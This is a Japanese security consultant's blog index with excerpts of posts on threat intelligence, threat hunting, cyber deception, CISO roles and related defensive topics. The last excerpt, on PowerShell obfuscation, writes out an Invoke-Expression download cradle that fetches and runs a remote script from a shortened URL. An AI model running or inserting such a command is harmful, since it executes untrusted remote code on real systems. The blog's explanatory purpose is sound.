セキュリティコンサルタントの日誌から

セキュリティに関するエッセイなど

『The Sliding Scale of Cyber Security』を再考する

『The Sliding Scale of Cyber Security』とは、Robert M. Leeにより提唱された概念で、サイバーセキュリティ態勢の成熟度を表すモデルです。このモデルによると、サイバーセキュリティの成熟度を脅威対応の観点からみて、5段階(Architecture・Passive Def…

Anti-Intelligence技術について考えてみる

(変更履歴)ある目的で執筆していたのですが、諸般の事情で執筆を中断したので、ブログに投稿しました。 攻撃者(Adversary)や脅威を理解する上でインテリジェンス技術の幅は様々であり、OSINTやAttributionなどの技術的分析手法や、ダイアモンドモデルな…

Threat Huntingとは何か?(2019年度版)

(変更履歴)過去のThreat Huntingに関する記事をいろいろ改善しながら執筆していたのですが、諸般の事情で執筆を中断したので、ブログに投稿しました。 Threat Huntingとは、セキュリティベンダーがシグニチャを提供するまでのゼロデイ期間において攻撃が行…

Cyber Deception技術とTime Based Security

Cyber Deceptionとは、組織のネットワークに対してDecoy(おとり)を仕掛けることにより、攻撃者のリソースを無駄遣いさせ、重要データに到達するまでの時間を稼ぎ、そして本来絶対にアクセスが発生しない端末・パラメータへのアクセスが発生した場合攻撃を…

経営層のための脅威インテリジェンス(Strategic Intelligence)

以前紹介したSANSの"Cyber Threat Intelligence Consumption"では、Strategic Intelligenceとは、経営層に向けたインテリジェンスとされています。経営層(Senior Management)に対する脅威インテリジェンスについて考えてみたいと思います。 なぜ経営層にイ…

「脅威」について考えてみる

「サイバー脅威インテリジェンス」、あるいは「脅威ベースのペネトレーションテスト」など、セキュリティの世界では脅威(Threat)という概念が多数出てきます。しかし、脅威(Threat)について具体的な説明があまり知られていないため、この記事ではそのこ…

Cyber Threat Attributionとは何か?(2019年度版)

Cyber Threat Attributionとは、攻撃主体の帰属を特定する技術です。 攻撃者も人間である以上、アイデンティティ(攻撃の目的)、動機、攻撃手口などを持っているはずです。それらを洗い出すことで、自分の組織が狙われないようにする、TTP(Tactics, Techni…

『2019 OSINT Guide』を翻訳してみた +α

OSINT(Open Source Intelligence)は、公開情報から様々な情報を集める技術です。 最近では、@Sh1ttyKids氏がOSINT技術を活用して日本のアンダーグランドコミュニティの情報をまとめています。 www.recordedfuture.com 年始にかけて、すこしOSINT技術を調査…

NCSCから公表されているOffice 365セキュリティのドキュメントを翻訳してみた!!

管理コストを下げるためにOffice 365の採用を行う企業も増えていると思いますが、その一方Office 365に対する攻撃も様々増えています。有名なところだと、産総研や明治大学が挙げられると思います。www.nikkei.com www.nikkei.com 翻訳:O365への侵入増加と…

CISOの役割とは?(2019年度版)

以前の記事でCISOの役割という記事を書きました。 しかし、最近いくつかドキュメントを読み少し更新できること、また以前紹介したCISO Mind Mapの日本語を作成したのでそれを紹介したいと思います。 www.scientia-security.org CISOに関するフレームワーク …

リスク分析の3つのアプローチとセキュリティの7S

(追記)2019年02月12日に追記を行いました。 リスク分析は、セキュリティ戦略策定の上で欠かせない基本的なアプローチです。 以前、日経SYSTEMSの記事「セキュリティコスト 5つの掟」(2018年10月号)にて、 一部のインタビュー記事が紹介されましたが、そ…

『インテリジェンス駆動型インシデントレスポンス』が発売されました!!+α

あけましておめでとうございます。 ご縁があり、翻訳させていただいた『インテリジェンス駆動型インシデントレスポンス』が12/26(水)に発売されました。ぜひ書店やAmazonでお買い求めください。(公開するの忘れてた...) www.oreilly.co.jp この本のセー…

Internet Week 2018で講演してきました!!

先日開催された、Intenet Week 2018の「D2-3 知れば組織が強くなる!ペネトレーションテストで分かったセキュリティ対策の抜け穴」のセッションで機会をいただき、講演をしてきました。 スライドは以下で公開しましたので、よろしければご参照ください。 Int…

US-CERTの「Publicly Available Tools Seen in Cyber Incidents Worldwide」を翻訳してみた!!

先日、US-CERTからサイバー犯罪に利用される公開ツールに関するアナウンスが出されました。 Publicly Available Tools Seen in Cyber Incidents Worldwide | US-CERT ITMediaにも取り上げられていますが、比較的面白い記事だったので勝手に翻訳してみました…

ドメイン保護手法に関する整理

ドメインは、企業ブランドを守る上で非常に重要な情報資産です。有名な企業のドメインを乗っ取ることができればフィッシング攻撃などへの悪用は非常にやりやすくなります。 今回は、ドメイン保護手法について、予防・検知・対応の観点から整理をしていきまし…

TLPT・TIBERに関する動向まとめ

金融庁より、TLPT(Therat-Lead Penetration Test)というキーワードが登場してきています。また、TIBER(Threat Intelligence Based Ethical Red Teaming)という概念が欧州系金融系を中心に話題になっています。 今回は、その動向と読むべき資料について整…

色で表すセキュリティ人材

色を使ってセキュリティチームの性質を説明することがよくあります。 例えば、攻撃技術(Offensive Technology)を専門とするチームをRed Teamと呼び、一方、セキュリティ監視やインシデント対応を行うセキュリティ運用チーム(Security Operation)のことを…

BSides Tokyoが開かれるらしい

LinkedInのブログでたまたま見つけましたが、BSides Tokyoが開かれるらしいです。 www.linkedin.com bsides.tokyo BSidesシリーズとは? 米国から始まった(?)セキュリティカンファレンスシリーズ群で、各地の発起人が確か一定の条件を満たせば、BSidesと…

#ssmjp 04に参加してきました!!

#ssmjp 4月に参加してきました。 ブログ枠で参加したのでアップデートしました。(勘違いして、アップロードできていなかったので、アップロードしました。ご迷惑をおかけしました。) 講演1:私の情報収集法 最初のスピーカーは「タイムライン・インテリ…

Cyber Threat Intelligenceとは何か?(その4・2018年度版)

前回の記事では、Operational Threat IntelligenceとStrategic Threat Intelligenceの定義について取り上げた後、Threat Intelligenceの共有方法についても触れました。今回は、Cyber Threat Intelligence Analystが陥りやすいバイアスやAttributionという技…

Cyber Threat Intelligenceとは何か?(その3・2018年度版)

2018/02/28 リンクを追加しました。 今回の記事では、Tactical Threat Intelligenceについて取り上げました。 今回は、SANSの"Cyber Threat Intelligence Consumption"をもとにOperational・Strategicレベルについて取り上げたいと思います。 Operational Th…

Cyber Threat Intelligenceとは何か?(その2・2018年度版)

前回の記事では、Cyber Threat Intelligenceの定義などについて解説しました。 www.scientia-security.org 今回の記事では、Threat Intelligenceの中でもTactical Threat Intelligence(戦術的インテリジェンス)に焦点を当ててみたいと思います。 戦術的イ…

Cyber Threat Intelligenceとは何か?(その1・2018年度版)

(修正履歴) 過去のエントリをいろいろ改善して再投稿しました。 2019年2月9日に一部更新を行いました。 今回のエントリーでは、Cyber Threat Intelligence(CTI)について解説をしていきます。 第1回では、Cyber Threat Intelligenceの概要について定義し…

Offensive Countermeasuresとは何か?

Offensive Countermeasures(OCM)とは、2009年にSANSインストラクターであるJohn Strand氏らが提唱した概念です。当時はあまり流行した考え方ではなかったと思いますが、Threat IntelligenceやThreat Huntingへの注目と合わせて、再度注目を集めている概念…

Active Defenseの定義とは?

2018/01/16 一部内容を更新しました。2018/02/07 一部内容を更新しました。 Active Defenseという言葉をご存知でしょうか? SANSでもSEC550: Active Defense, Offensive Countermeasures and Cyber Deceptionというコースが用意されていますし、CTI(Cyber T…

各規制はセキュリティ診断の頻度をどのように定めているか?

2018/01/09 金融庁関連の話題を追加しました。 少し前ですが、2017年8月にJPCERT/CCが「Web サイトへのサイバー攻撃に備えて」という報告を発表して、セキュリティ診断・ペネトレーションテストの頻度について言及をしています。今回は、各レギュレーシ…

脅威の検知レイヤーモデル

(修正履歴)一部追記しました。@ 2019.02.10 現在、Cyber Threat IntelligenceやThreat Intelligenceに興味を持っていますが、脅威を検知手法について整理してみました。 時間軸による検知レイヤーモデル 色々な考え方があるますが、検知のインプットは大き…

Threat Hunting for Dummiesを読んでみた!!

カンファレンスでもらった"Threat Hunting for Dummies"を積読していたのですが、時間ができたので読んで見たのでメモをまとめます。EDRで有名なCarbon Black社が書いているので、クオリティも十分でした。 www.carbonblack.com Threat Huntingの定義と目的 …

CISSPの勉強方法

CISSP(Certified Information Systems Security Professional)という試験は、セキュリティの経験と全般的な知識を持っていることを示す資格です。一般的かつセキュリティと重要な資格である一方、独学用の勉強リソースはあまり多くないと言わざるを得ませ…

PowerShellの難読化について

PowerShellは、Post-Exploitationプロセスで非常に良く使われます。例えば、以下のコマンドを実行するとリモートにあるファイルを取得してその内容を実行してくれます。 Invoke-Expression (New-Object Net.WebClient).DownloadString("http://bit.ly/L3g1t"…